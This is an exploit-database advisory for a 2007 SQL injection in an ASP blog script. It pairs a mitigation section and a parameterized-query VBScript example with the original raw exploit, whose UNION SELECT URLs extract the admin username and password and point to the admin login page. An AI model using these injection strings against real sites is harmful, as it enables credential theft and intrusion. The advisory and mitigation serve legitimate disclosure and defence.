vendor:
by: CyberGhost
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Furkan Taştan Blog Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks on the Furkan Taştan Blog website. By manipulating the 'id' parameter in the '/kategori.asp?kat=goster&id=' URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the website should implement proper input validation and parameterized queries to prevent SQL injection attacks. Regular security audits and updates should also be performed.
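
The mitigation above, sketched for a Classic ASP category page as an added example (not code from the blog script, whose source is not shown here). The connection string key `BlogConnString`, the table `yazilar` and the columns `baslik` and `kategori_id` are hypothetical; the ADO objects and constants are the standard ones.

```vbscript
<%
Option Explicit

' ADO constants (values as defined in adovbs.inc)
Const adInteger = 3
Const adParamInput = 1
Const adCmdText = 1

' Assumed vulnerable pattern (the original source is not on this page):
'   sql = "SELECT ... WHERE kategori_id = " & Request.QueryString("id")

' Returns True and sets outId only when raw is a plain decimal integer.
' Input such as "-1 union select ..." fails the pattern and is rejected.
Function TryParseId(raw, ByRef outId)
    Dim re
    TryParseId = False
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"          ' at most 9 digits, always fits a Long
    If re.Test(raw & "") Then
        outId = CLng(raw)
        TryParseId = True
    End If
End Function

Dim conn, cmd, rs, catId

' 1) Input validation: refuse anything that is not a numeric id.
If Not TryParseId(Request.QueryString("id"), catId) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("BlogConnString")   ' hypothetical configuration key

' 2) Parameterized query: the id is bound as a typed value, never as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT baslik FROM yazilar WHERE kategori_id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , catId)
Set rs = cmd.Execute

Do Until rs.EOF
    Response.Write "<h2>" & Server.HTMLEncode(rs("baslik") & "") & "</h2>"
    rs.MoveNext
Loop
rs.Close
conn.Close
%>
```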

Exploit-DB raw data:

#Title  : Furkan Taştan Blog Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://furkantastan.somee.com/blog
#Script Download Page: http://www.aspindir.com/indir.asp?ID=5152

#Vuln.

#Username : /kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
#Password : /kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar

#Admin Login : /admin/admin.asp

====================================

My Saz friends: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10

And All TURKISH HACKERS !

# milw0rm.com [2007-10-05]